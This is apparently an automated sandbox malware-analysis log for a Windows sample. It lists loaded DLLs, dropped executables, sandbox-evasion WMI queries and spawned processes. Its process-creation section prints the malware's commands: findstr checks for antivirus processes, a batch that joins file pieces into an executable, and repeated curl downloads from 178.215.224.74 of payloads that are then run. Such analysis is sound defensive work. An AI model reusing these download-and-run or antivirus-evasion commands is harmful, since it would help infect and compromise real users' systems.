Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: vqMMwqCFZQ.exeStatic file information: File size 1069345 > 1048576
Source: vqMMwqCFZQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, nircmdc.exe.50.dr
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: 7zxa.dll.50.drStatic PE information: section name: .sxdata
Source: 7za.dll.50.drStatic PE information: section name: .sxdata
Source: 7za.exe.50.drStatic PE information: section name: .sxdata
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004080D0 push dword ptr [edi+ecx-75h]; retf 50_2_004080DA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041B280 push eax; ret 50_2_0041B2AE
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00407E8F push dword ptr [edi+ecx-75h]; retf 50_2_00407E99
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139918\Ur.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139918\Ur.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_50-14249
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pif TID: 3468Thread sleep time: -15120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,50_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004107A0 FindFirstFileA,50_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_004062D5 FindFirstFileW,FindClose,86_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00402E18 FindFirstFileW,86_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,86_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: curl.exe, 00000040.00000003.2845869310.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000059.00000003.3065458553.0000000003080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: curl.exe, 00000020.00000003.2621923061.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2639184295.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000061.00000003.3105199413.0000000003590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: curl.exe, 0000002F.00000003.2756663510.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: curl.exe, 00000016.00000003.2519800125.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001A.00000003.2589094875.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000003.2605564917.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000003.2666266763.0000000003210000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.2685688683.0000000003260000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002C.00000003.2702350921.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000035.00000003.2782045185.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000038.00000003.2799289711.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000043.00000003.2876292137.0000000003221000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000046.00000003.2895039416.0000000003550000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000049.00000003.2912432151.0000000000D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004125F0 LeaveCriticalSection,CreateFileA,EnterCriticalSection,CreateFileA,GetKernelObjectSecurity,GetKernelObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetKernelObjectSecurity,SetKernelObjectSecurity,GetProcessHeap,HeapFree,CloseHandle,CreateFileA,CloseHandle,50_2_004125F0
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
